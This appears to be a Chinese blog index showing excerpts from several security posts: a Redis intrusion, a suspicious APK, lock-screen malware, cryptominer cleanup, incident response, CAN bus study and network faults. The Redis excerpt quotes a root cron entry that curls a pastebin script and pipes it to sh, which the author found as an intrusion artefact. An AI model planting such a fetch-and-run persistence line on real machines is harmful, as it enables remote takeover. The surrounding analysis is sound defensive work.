起因 偶然間發現redis里有一個陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道這肯定不是我們存的，再看value我警覺了，這是要定時執行腳本啊。 分析 ...

寫個筆記記錄一下，起因是朋友在QQ上發了個連接叫我看看 安不安全，叫我幫他看看，反正在店里待着也沒生意，那就順便看看咯。 打開這個網址 會自動彈出下載一個名為OOXX的APK安裝包。 ...

有一天，在機緣巧合之下我獲得了一個鎖機軟件（是多巧合阿喂！），然后興高采烈的把它拖入了虛擬機里蹂躪（>_<!）。 很巧，軟件有虛擬機檢測。。。 Emmmm好吧，隨便 ...

Prepare CAN通信協議使用了有一段時間了，但都是基於軟件層面的使用，對於其波形不是很了解，正好這段時間比較閑，是時候補補硬知識。 開始之前，先介紹一下設備： 咸魚淘來的古董級別示波 ...

XX公司網絡卡斷問題 1. 問題現象 2017年XX公司機關網絡出現幾次異常情況，並尋求內外部專家對異常情況進行診斷分析，均未找到原因，具體情況如下： 1.XX分公司機關網絡IP地址為10.0.0.1-10.0.0.254，上半年約有15台電 ...

概述： 9.4號臨時接到通知讓一個人去應急，第一次應急，比較虛，到客戶那里了解了一下情況。主要現象是流量異常，CPU占用過高。 發現連接數超多-17779，然后在試圖連接其他主機的22端口 發現異常進程，當初進行殺死之后，從九點到晚上十點cpu都是正常的，然后上午通過查看日志last ...

背景 新接手了個環境，同事交接時說這些機器中過挖礦病毒還沒重裝，我TM。。。 線上環境不好動，只能手動查殺了。 操作系統如下： 過程 ssh上去，ps -ef看到如下： 手動kill掉進程，很快會生成新的，猜測有守護進程。用STOP信號讓它停止。 查看定時任務清理 ...

首先貼上情況 一個redis 程序占用cpu 46%,雖然redis-server 有定時清理過期的鍵,但也不會占用這么高的CPU吧,一般都是0.3% 看看這個進程什么鬼 ...